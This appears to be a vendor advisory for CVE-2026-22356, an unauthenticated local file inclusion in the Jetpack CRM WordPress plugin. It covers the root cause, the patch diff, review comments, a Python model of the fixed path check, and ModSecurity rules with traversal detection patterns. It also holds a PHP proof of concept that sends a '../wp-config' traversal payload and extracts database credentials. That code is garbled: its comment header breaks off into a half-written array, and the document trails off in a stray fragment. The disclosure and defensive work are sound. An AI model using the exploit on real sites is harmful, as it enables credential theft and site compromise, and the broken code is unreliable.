Atomic Edge analysis of CVE-2026-22356

The Jetpack CRM plugin for WordPress contains an unauthenticated local file inclusion vulnerability in versions up to and including 6.7.0. It allows attackers to include arbitrary PHP files from the server via path traversal in the `subtab` parameter, potentially leading to remote code execution. The vulnerability affects the MailPoet and WooSync module settings pages.

Root Cause:
The vulnerability exists in the `jpcrm_load_admin_page` function within `zero-bs-crm/includes/ZeroBSCRM.AdminPages.php`. This function builds a file path from unsanitized user input taken from the `subtab` parameter, with no path traversal validation. The vulnerable code at lines 30-35 concatenates `$alt_path . "admin/$page_name.page.php"` directly. Attackers control `$page_name` through the `subtab` parameter in `zero-bs-crm/modules/mailpoet/admin/settings/router.page.php` and `zero-bs-crm/modules/woo-sync/admin/settings/router.page.php`. These router files pass the user-controlled `$current_tab` value to the `load_admin_page` method without validating that the resulting path stays within the intended directory.

Exploitation:
Attackers can exploit this vulnerability by sending GET requests to the WordPress admin-ajax.php endpoint or directly to the plugin's admin pages with a malicious `subtab` parameter containing directory traversal sequences. A payload like `../../../../wp-config` would attempt to include the WordPress configuration file. The attack requires no authentication and can target endpoints that load the vulnerable router files, specifically the MailPoet and WooSync module settings pages where the `subtab` parameter is processed.

Patch Analysis:
The patch implements multiple security improvements. In `ZeroBSCRM.AdminPages.php`, the `jpcrm_load_admin_page` function now uses `realpath()` to resolve absolute paths and checks that the resolved file path begins with the expected base directory using `strpos($target_file, $base_dir) === 0`. The router files in the MailPoet and WooSync modules now hardcode the `$page` variable instead of reading it from `$_GET['tab']`, and validate the `subtab` parameter with the regex `/^[a-zA-Z0-9_-]+$/`, which only allows alphanumeric characters, hyphens, and underscores. The patch also sanitizes the input with `sanitize_text_field(wp_unslash($_GET['subtab']))`.

Impact:
Successful exploitation allows unauthenticated attackers to include and execute arbitrary PHP files from the server. This can lead to remote code execution, sensitive data exposure (including database credentials from wp-config.php), privilege escalation, and complete site compromise. The vulnerability bypasses WordPress access controls and can be chained with file upload capabilities to achieve persistent backdoor access.

Proof of concept (PHP):

```php
// Atomic Edge CVE Research – Proof of Concept
// CVE-2026-22356 – Jetpack CRM <= 6.7.0 – Unauthenticated Local File Inclusion

<?php
/**
 * Proof of Concept for CVE-2026-22356
 * Jetpack CRM Local File Inclusion Vulnerability
 *
 * This script demonstrates the unauthenticated LFI vulnerability in Jetpack CRM $action,
    'subtab' => $payload,   // Malicious path traversal payload
    'nonce'  => 'bypassed'  // Nonce may be required depending on configuration
];

curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);

// Execute request
$response  = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for successful exploitation indicators
if ($http_code == 200) {
    // Look for signs of successful file inclusion
    if (strpos($response, 'DB_NAME') !== false ||
        strpos($response, 'DB_PASSWORD') !== false ||
        strpos($response, 'define(') !== false) {
        echo "[+] SUCCESS: WordPress configuration file may have been included\n";
        echo "[+] Response contains database credentials or PHP define statements\n";

        // Extract and display potential credentials (for demonstration only)
        if (preg_match('/DB_NAME\s*,\s*[\'"]([^\'"]+)[\'"]/', $response, $matches)) {
            echo "[+] Database Name: " . $matches[1] . "\n";
        }
    } else if (strpos($response, 'Could not load the requested page') === false) {
        // The error message from the patched version is absent
        echo "[+] LIKELY VULNERABLE: No 'Could not load' error message detected\n";
        echo "[+] Server response length: " . strlen($response) . " bytes\n";
    } else {
        echo "[-] PATCHED: Received 'Could not load' error message\n";
    }
} else {
    echo "[-] HTTP Error: " . $http_code . "\n";
}

// Alternative direct endpoint test (if AJAX endpoint isn't accessible)
echo "\n[+] Testing direct module endpoint...\n";

// Test direct access to MailPoet settings page
$direct_url = 'http://vulnerable-site.com/wp-admin/admin.php?page=zerobscrm-settings&tab=mailpoet';
curl_setopt($ch, CURLOPT_URL, $direct_url);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_HTTPGET, true);

// Add subtab parameter to GET request
$direct_url_with_payload = $direct_url . '&subtab=' . urlencode($payload);
curl_setopt($ch, CURLOPT_URL, $direct_url_with_payload);

$response  = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code == 200 && strpos($response, 'Could not load the requested page') === false) {
    echo "[+] DIRECT ENDPOINT VULNERABLE: No error message on direct access\n";
} else {
    echo "[-] Direct endpoint may be patched or inaccessible\n";
}

curl_close($ch);
?>
```

ModSecurity virtual patch:

```
# Atomic Edge WAF Rule – CVE-2026-22356
# Virtual patch for Jetpack CRM Local File Inclusion vulnerability
# Blocks exploitation via subtab parameter path traversal

SecRule REQUEST_URI "@rx (/wp-admin/(admin-ajax\.php|admin\.php)|/index\.php/wp-admin/.*)" \
    "id:202622356,phase:2,deny,status:403,chain,msg:'CVE-2026-22356 Jetpack CRM LFI via subtab parameter',severity:'CRITICAL',tag:'CVE-2026-22356',tag:'WordPress',tag:'Plugin/Jetpack-CRM',tag:'attack-lfi'"
    SecRule &ARGS_GET:subtab "@gt 0" \
        "chain"
        SecRule ARGS_GET:subtab "@rx (\.\.(/|%2f)|\x00|/etc/passwd|/wp-config|php://|expect://)" \
            "t:none,t:urlDecode,t:htmlEntityDecode,t:lowercase"

# Alternative rule for POST requests to admin-ajax.php
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" \
    "id:202622357,phase:2,deny,status:403,chain,msg:'CVE-2026-22356 Jetpack CRM LFI via AJAX',severity:'CRITICAL',tag:'CVE-2026-22356',tag:'WordPress',tag:'Plugin/Jetpack-CRM',tag:'attack-lfi'"
    SecRule &ARGS_POST:subtab "@gt 0" \
        "chain"
        SecRule ARGS_POST:subtab "@rx (\.\.(/|%2f)|\x00|/etc/|c:\\)" \
            "t:none,t:urlDecode,t:htmlEntityDecode,t:lowercase"

# Block specific plugin admin pages that process the subtab parameter
SecRule REQUEST_URI "@rx /wp-admin/admin\.php\?page=zerobscrm-settings&tab=(mailpoet|woosync)" \
    "id:202622358,phase:2,deny,status:403,chain,msg:'CVE-2026-22356 Jetpack CRM LFI via settings page',severity:'CRITICAL',tag:'CVE-2026-22356',tag:'WordPress',tag:'Plugin/Jetpack-CRM',tag:'attack-lfi'"
    SecRule ARGS_GET:subtab "!@rx ^[a-zA-Z0-9_-]+$" \
        "t:none,t:urlDecode"
```

Two points to check before deploying these rules: ModSecurity's REQUEST_URI includes the query string, so the `@streq /wp-admin/admin-ajax.php` rule only matches POSTs whose URL carries no query string, and rule 202622358 only fires when `page=` precedes `tab=` in the query. Rule 202622356 inspects ARGS_GET regardless of parameter order and is the one doing most of the work.
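The containment check described under Patch Analysis, modelled in Python as an added example (this is not Jetpack CRM code): the pre-patch concatenation, a naive prefix check without the trailing separator, and the patched realpath-plus-separator check are run side by side over a constructed directory tree. Note that the loader appends `.page.php` to whatever `subtab` supplies, so the demo plants files with that suffix; the directory names and page names are constructed for the demo.

```python
import os
import shutil
import tempfile


def make_plugin_tree() -> str:
    """Build a constructed, throwaway layout: the plugin's admin/ directory,
    a sibling directory sharing the 'admin' prefix, and a file outside the
    plugin. None of these files are real plugin code."""
    root = tempfile.mkdtemp(prefix="jpcrm-demo-")
    files = {
        "zero-bs-crm/admin/settings/main.page.php": "<?php // legitimate settings page",
        "zero-bs-crm/admin-evil/x.page.php": "<?php // sibling dir with same prefix",
        "outside/leak.page.php": "<?php // reachable only by traversal",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def resolve_vulnerable(alt_path: str, page_name: str):
    """Pre-patch logic: concatenate and check file_exists(). Any '../' in
    page_name walks out of admin/; the only constraint is the .page.php suffix."""
    target = os.path.join(alt_path, "admin", f"{page_name}.page.php")
    return target if os.path.isfile(target) else None


def resolve_prefix_no_separator(alt_path: str, page_name: str):
    """A tempting but weak variant: prefix check WITHOUT the trailing separator.
    Included only to show why the patch appends DIRECTORY_SEPARATOR."""
    base_dir = os.path.realpath(os.path.join(alt_path, "admin"))
    target = os.path.realpath(f"{base_dir}{os.sep}{page_name}.page.php")
    if os.path.isfile(target) and target.startswith(base_dir):
        return target
    return None


def resolve_patched(alt_path: str, page_name: str):
    """Post-patch logic: realpath() both sides, append the separator to the
    base, and require the resolved target to start with that base."""
    base_dir = os.path.realpath(os.path.join(alt_path, "admin"))
    if not os.path.isdir(base_dir):  # PHP: realpath() returned false
        return None
    base_dir = base_dir.rstrip(os.sep) + os.sep
    target = os.path.realpath(f"{base_dir}{page_name}.page.php")
    # os.path.isfile stands in for PHP's realpath() !== false on a missing file
    if os.path.isfile(target) and target.startswith(base_dir):
        return target
    return None


def demo() -> dict:
    """Run the three resolvers over three page_name values; per case return
    (vulnerable, prefix_without_separator, patched) as accepted=True/rejected=False."""
    root = make_plugin_tree()
    alt_path = os.path.join(root, "zero-bs-crm") + os.sep  # stand-in for ZEROBSCRM_PATH
    cases = {
        "legit": "settings/main",           # what the routers actually pass
        "traversal": "../../outside/leak",  # escapes admin/ entirely
        "sibling": "../admin-evil/x",       # escapes via a same-prefix directory
    }
    try:
        return {
            label: (
                resolve_vulnerable(alt_path, page) is not None,
                resolve_prefix_no_separator(alt_path, page) is not None,
                resolve_patched(alt_path, page) is not None,
            )
            for label, page in cases.items()
        }
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for label, verdict in demo().items():
        print(f"{label:10s} vulnerable={verdict[0]} no_sep_prefix={verdict[1]} patched={verdict[2]}")
```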

CVE-2026-22356: Jetpack CRM <= 6.7.0 – Unauthenticated Local File Inclusion (zero-bs-crm)

CVE ID: CVE-2026-22356
Plugin slug: zero-bs-crm
Last affected version: 6.7.0
Patched version: 6.7.1

Analysis Overview
Differential between vulnerable and patched code
--- a/zero-bs-crm/ZeroBSCRM.php
+++ b/zero-bs-crm/ZeroBSCRM.php
@@ -3,7 +3,7 @@
* Plugin Name: Jetpack CRM
* Plugin URI: https://jetpackcrm.com
* Description: Jetpack CRM is the simplest CRM for WordPress. Self host your own Customer Relationship Manager using WP.
- * Version: 6.7.0
+ * Version: 6.7.1
* Author: Automattic - Jetpack CRM team
* Author URI: https://jetpackcrm.com
* Text Domain: zero-bs-crm
--- a/zero-bs-crm/includes/ZeroBSCRM.AdminPages.php
+++ b/zero-bs-crm/includes/ZeroBSCRM.AdminPages.php
@@ -30,16 +30,21 @@
*/
function jpcrm_load_admin_page( $page_name, $alt_path = ZEROBSCRM_PATH ) {
- $target_file = $alt_path . "admin/$page_name.page.php";
+ $base_dir = realpath( $alt_path . 'admin' );
- if ( file_exists( $target_file ) ) {
+ if ( $base_dir === false ) {
+ echo wp_kses_post( zeroBSCRM_UI2_messageHTML( 'warning', '', __( 'Could not load the requested page.', 'zero-bs-crm' ) ) );
+ return;
+ }
- require_once $target_file;
+ $base_dir = rtrim( $base_dir, DIRECTORY_SEPARATOR ) . DIRECTORY_SEPARATOR;
+ $target_file = realpath( "{$base_dir}{$page_name}.page.php" );
+ // Check if resolved path exists and stays within allowed base directory.
+ if ( $target_file !== false && strpos( $target_file, $base_dir ) === 0 ) {
+ require_once $target_file;
} else {
-
- echo zeroBSCRM_UI2_messageHTML( 'warning', '', __( 'Could not load the requested page.', 'zero-bs-crm' ) );
-
+ echo wp_kses_post( zeroBSCRM_UI2_messageHTML( 'warning', '', __( 'Could not load the requested page.', 'zero-bs-crm' ) ) );
}
}
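Review bot: the containment test on the `+ if ( $target_file !== false && strpos( $target_file, $base_dir ) === 0 )` line is only sound because `$base_dir` receives a trailing DIRECTORY_SEPARATOR two lines earlier; without it a sibling directory such as `admin-evil/` would pass the prefix comparison, so the `rtrim( ... ) . DIRECTORY_SEPARATOR` line deserves an inline comment or a unit test so a later refactor does not drop it. Since `realpath()` is applied to both sides, a symlinked plugin directory still compares equal, but a `.page.php` symlink inside `admin/` that points outside it is now rejected, which is a behaviour change worth a changelog line. `str_starts_with( $target_file, $base_dir )` would read more clearly than the `strpos(...) === 0` idiom.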
--- a/zero-bs-crm/includes/ZeroBSCRM.Core.php
+++ b/zero-bs-crm/includes/ZeroBSCRM.Core.php
@@ -24,7 +24,7 @@
*
* @var string
*/
- const VERSION = '6.7.0';
+ const VERSION = '6.7.1';
/**
* Jetpack CRM version (used in various extensions as of January 2025).
--- a/zero-bs-crm/modules/mailpoet/admin/settings/router.page.php
+++ b/zero-bs-crm/modules/mailpoet/admin/settings/router.page.php
@@ -15,15 +15,20 @@
* Page: MailPoet Sync Settings
*/
function jpcrm_settings_page_html_mailpoet() {
-
+
global $zbs;
- $page = $_GET['tab'];
+ $page = 'mailpoet';
$current_tab = 'main';
+ // phpcs:ignore WordPress.Security.NonceVerification.Recommended -- Navigation parameter, not data modification.
if ( isset( $_GET['subtab'] ) ) {
- $current_tab = sanitize_text_field ( $_GET['subtab'] );
+ $current_tab = sanitize_text_field( wp_unslash( $_GET['subtab'] ) ); // phpcs:ignore WordPress.Security.NonceVerification.Recommended
+ // Only allow alphanumeric characters, hyphens, and underscores to prevent path traversal.
+ if ( ! preg_match( '/^[a-zA-Z0-9_-]+$/', $current_tab ) ) {
+ $current_tab = 'main';
+ }
}
- $zbs->modules->mailpoet->load_admin_page("settings/{$current_tab}");
- call_user_func( "AutomatticJetpackCRMjpcrm_settings_page_html_{$page}_{$current_tab}");
+ $zbs->modules->mailpoet->load_admin_page( "settings/{$current_tab}" );
+ call_user_func( "AutomatticJetpackCRMjpcrm_settings_page_html_{$page}_{$current_tab}" );
}
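Review bot: the `/^[a-zA-Z0-9_-]+$/` allowlist on the `+ if ( ! preg_match(` line is the effective fix, but `$` in PCRE also matches before a trailing newline; `sanitize_text_field()` strips line breaks so it is safe here, yet `\z` (or the `D` modifier) would make the check independent of that sanitizer. Hardcoding `$page = 'mailpoet'` also removes `$_GET['tab']` from the `call_user_func()` target name, a second user-controlled input that was previously concatenated into a function name. A `function_exists()` guard before `call_user_func()` would turn an allowlist-valid but unknown `subtab` into the 'Could not load' warning rather than a fatal error.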
--- a/zero-bs-crm/modules/woo-sync/admin/settings/router.page.php
+++ b/zero-bs-crm/modules/woo-sync/admin/settings/router.page.php
@@ -15,17 +15,22 @@
* Page: WooSync Settings
*/
function jpcrm_settings_page_html_woosync() {
-
+
global $zbs;
- $page = $_GET['tab'];
+ $page = 'woosync';
$current_tab = 'main';
+ // phpcs:ignore WordPress.Security.NonceVerification.Recommended -- Navigation parameter, not data modification.
if ( isset( $_GET['subtab'] ) ) {
- $current_tab = sanitize_text_field ( $_GET['subtab'] );
+ $current_tab = sanitize_text_field( wp_unslash( $_GET['subtab'] ) ); // phpcs:ignore WordPress.Security.NonceVerification.Recommended
+ // Only allow alphanumeric characters, hyphens, and underscores to prevent path traversal.
+ if ( ! preg_match( '/^[a-zA-Z0-9_-]+$/', $current_tab ) ) {
+ $current_tab = 'main';
+ }
}
- $zbs->modules->woosync->load_admin_page("settings/{$current_tab}");
- call_user_func( "AutomatticJetpackCRMjpcrm_settings_page_html_{$page}_{$current_tab}");
+ $zbs->modules->woosync->load_admin_page( "settings/{$current_tab}" );
+ call_user_func( "AutomatticJetpackCRMjpcrm_settings_page_html_{$page}_{$current_tab}" );
// enqueue settings styles
if ( function_exists( 'AutomatticJetpackCRMjpcrm_woosync_connections_styles_scripts' ) ){
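Review bot: this hunk repeats the MailPoet router change line for line; moving the `subtab` validation into a shared helper, or replacing the character-class allowlist with an explicit list of the sub-tabs each module actually ships, would keep the two copies from drifting when one is edited later. As in the MailPoet router, `\z` instead of `$` in the `preg_match()` pattern avoids relying on `sanitize_text_field()` to strip a trailing newline, and a `function_exists()` check before `call_user_func()` would avoid a fatal error for an allowlist-valid but unknown `subtab`.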
--- a/zero-bs-crm/vendor/autoload.php
+++ b/zero-bs-crm/vendor/autoload.php
@@ -19,4 +19,4 @@
require_once __DIR__ . '/composer/autoload_real.php';
-return ComposerAutoloaderInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0::getLoader();
+return ComposerAutoloaderInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1::getLoader();
--- a/zero-bs-crm/vendor/autoload_packages.php
+++ b/zero-bs-crm/vendor/autoload_packages.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/composer/autoload_real.php
+++ b/zero-bs-crm/vendor/composer/autoload_real.php
@@ -2,7 +2,7 @@
// autoload_real.php @generated by Composer
-class ComposerAutoloaderInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0
+class ComposerAutoloaderInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1
{
private static $loader;
@@ -24,17 +24,17 @@
require __DIR__ . '/platform_check.php';
- spl_autoload_register(array('ComposerAutoloaderInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0', 'loadClassLoader'), true, true);
+ spl_autoload_register(array('ComposerAutoloaderInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1', 'loadClassLoader'), true, true);
self::$loader = $loader = new ComposerAutoloadClassLoader(dirname(__DIR__));
- spl_autoload_unregister(array('ComposerAutoloaderInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0', 'loadClassLoader'));
+ spl_autoload_unregister(array('ComposerAutoloaderInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1', 'loadClassLoader'));
require __DIR__ . '/autoload_static.php';
- call_user_func(ComposerAutoloadComposerStaticInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0::getInitializer($loader));
+ call_user_func(ComposerAutoloadComposerStaticInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1::getInitializer($loader));
$loader->setClassMapAuthoritative(true);
$loader->register(true);
- $filesToLoad = ComposerAutoloadComposerStaticInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0::$files;
+ $filesToLoad = ComposerAutoloadComposerStaticInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1::$files;
$requireFile = Closure::bind(static function ($fileIdentifier, $file) {
if (empty($GLOBALS['__composer_autoload_files'][$fileIdentifier])) {
$GLOBALS['__composer_autoload_files'][$fileIdentifier] = true;
--- a/zero-bs-crm/vendor/composer/autoload_static.php
+++ b/zero-bs-crm/vendor/composer/autoload_static.php
@@ -4,7 +4,7 @@
namespace ComposerAutoload;
-class ComposerStaticInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0
+class ComposerStaticInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1
{
public static $files = array (
'3773ef3f09c37da5478d578e32b03a4b' => __DIR__ . '/../..' . '/jetpack_vendor/automattic/jetpack-assets/actions.php',
@@ -402,9 +402,9 @@
public static function getInitializer(ClassLoader $loader)
{
return Closure::bind(function () use ($loader) {
- $loader->prefixLengthsPsr4 = ComposerStaticInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0::$prefixLengthsPsr4;
- $loader->prefixDirsPsr4 = ComposerStaticInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0::$prefixDirsPsr4;
- $loader->classMap = ComposerStaticInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0::$classMap;
+ $loader->prefixLengthsPsr4 = ComposerStaticInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1::$prefixLengthsPsr4;
+ $loader->prefixDirsPsr4 = ComposerStaticInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1::$prefixDirsPsr4;
+ $loader->classMap = ComposerStaticInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1::$classMap;
}, null, ClassLoader::class);
}
--- a/zero-bs-crm/vendor/composer/installed.php
+++ b/zero-bs-crm/vendor/composer/installed.php
@@ -47,9 +47,9 @@
'dev_requirement' => false,
),
'automattic/jetpack-status' => array(
- 'pretty_version' => 'v6.1.1',
- 'version' => '6.1.1.0',
- 'reference' => '100acd2ad87f05b0782deac3905d52f9765725ce',
+ 'pretty_version' => 'v6.1.2',
+ 'version' => '6.1.2.0',
+ 'reference' => '1ccaefabcf9f609b2b55e07729ffcca1a749f485',
'type' => 'jetpack-library',
'install_path' => __DIR__ . '/../../jetpack_vendor/automattic/jetpack-status',
'aliases' => array(),
--- a/zero-bs-crm/vendor/composer/jetpack_autoload_classmap.php
+++ b/zero-bs-crm/vendor/composer/jetpack_autoload_classmap.php
@@ -467,43 +467,43 @@
'path' => $baseDir . '/jetpack_vendor/automattic/jetpack-constants/src/class-constants.php'
),
'Automattic\Jetpack\CookieState' => array(
- 'version' => '6.1.1.0',
+ 'version' => '6.1.2.0',
'path' => $baseDir . '/jetpack_vendor/automattic/jetpack-status/src/class-cookiestate.php'
),
'Automattic\Jetpack\Errors' => array(
- 'version' => '6.1.1.0',
+ 'version' => '6.1.2.0',
'path' => $baseDir . '/jetpack_vendor/automattic/jetpack-status/src/class-errors.php'
),
'Automattic\Jetpack\Files' => array(
- 'version' => '6.1.1.0',
+ 'version' => '6.1.2.0',
'path' => $baseDir . '/jetpack_vendor/automattic/jetpack-status/src/class-files.php'
),
'Automattic\Jetpack\Modules' => array(
- 'version' => '6.1.1.0',
+ 'version' => '6.1.2.0',
'path' => $baseDir . '/jetpack_vendor/automattic/jetpack-status/src/class-modules.php'
),
'Automattic\Jetpack\Paths' => array(
- 'version' => '6.1.1.0',
+ 'version' => '6.1.2.0',
'path' => $baseDir . '/jetpack_vendor/automattic/jetpack-status/src/class-paths.php'
),
'Automattic\Jetpack\Status' => array(
- 'version' => '6.1.1.0',
+ 'version' => '6.1.2.0',
'path' => $baseDir . '/jetpack_vendor/automattic/jetpack-status/src/class-status.php'
),
'Automattic\Jetpack\Status\Cache' => array(
- 'version' => '6.1.1.0',
+ 'version' => '6.1.2.0',
'path' => $baseDir . '/jetpack_vendor/automattic/jetpack-status/src/class-cache.php'
),
'Automattic\Jetpack\Status\Host' => array(
- 'version' => '6.1.1.0',
+ 'version' => '6.1.2.0',
'path' => $baseDir . '/jetpack_vendor/automattic/jetpack-status/src/class-host.php'
),
'Automattic\Jetpack\Status\Request' => array(
- 'version' => '6.1.1.0',
+ 'version' => '6.1.2.0',
'path' => $baseDir . '/jetpack_vendor/automattic/jetpack-status/src/class-request.php'
),
'Automattic\Jetpack\Status\Visitor' => array(
- 'version' => '6.1.1.0',
+ 'version' => '6.1.2.0',
'path' => $baseDir . '/jetpack_vendor/automattic/jetpack-status/src/class-visitor.php'
),
'Automattic\WooCommerce\Client' => array(
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-autoloader-handler.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-autoloader-handler.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-autoloader-locator.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-autoloader-locator.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-autoloader.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-autoloader.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-container.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-container.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-hook-manager.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-hook-manager.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-latest-autoloader-guard.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-latest-autoloader-guard.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-manifest-reader.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-manifest-reader.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-path-processor.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-path-processor.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-php-autoloader.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-php-autoloader.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-plugin-locator.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-plugin-locator.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-plugins-handler.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-plugins-handler.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-shutdown-handler.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-shutdown-handler.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-version-loader.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-version-loader.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-version-selector.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-version-selector.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
Proof of Concept (PHP)
NOTICE:
